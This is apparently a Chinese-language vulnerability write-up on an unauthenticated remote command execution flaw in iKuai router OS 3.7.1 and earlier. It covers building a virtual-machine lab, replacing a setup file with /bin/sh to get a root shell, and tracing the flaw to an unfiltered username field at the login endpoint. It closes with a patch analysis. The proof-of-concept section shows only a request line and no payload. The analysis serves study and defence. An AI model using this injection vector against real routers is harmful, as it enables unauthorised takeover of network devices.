漏洞描述
1 | 漏洞类型:未授权RCE |
影响范围
Ikuai
路由器 OS 3.7.1
及之前版本
环境搭建
新建虚拟机,光盘选择Ikuai
的iso
镜像
操作系统选择Linux
,版本选择Ubuntu
即可
设置虚拟机名字和安装位置
设置处理器
设置内存
网络类型桥接
选择I/O
控制器
选择磁盘类型
创建新磁盘
设置磁盘大小
下一步
完成
编辑虚拟机设置->添加->网络适配器(网卡2设置仅主机模式)
启动虚拟机,安装硬盘
1 | Ikuai`默认地址是`192.168.1.1 |
设置网卡绑定
1 | del lan1 |
设置LAN/WAN
地址
配置成功,访问web
端,默认账号密码:admin/admin
获取shell
1 | web`端开启`telnet`连接后发现是`CLI |
利用漏洞进入root shell
查看telnet
进程信息如下:
1 | 9936 root 1336 S {exe} telnetd -l /etc/setup/rc.console |
然后查看/etc/setup/rc.console
文件
1 | ... |
可以看到输入指令调用对应的程序,那么挂载虚拟机,将内存文件中的/etc/setup/setup.ping
替换为///////////////bin/sh
,启动后输入4
即可获取shell
漏洞分析
webman.lua
程序中登录时,对username
字段未过滤,传递给ikngx.lua
的logger
函数造成命令执行
命令执行
POC
1 | POST /Action/login HTTP/1.1 |
补丁分析
登录前,先对username
字段进行过滤处理
参考链接
环境搭建:
https://blog.csdn.net/weixin_43343299/article/details/113701449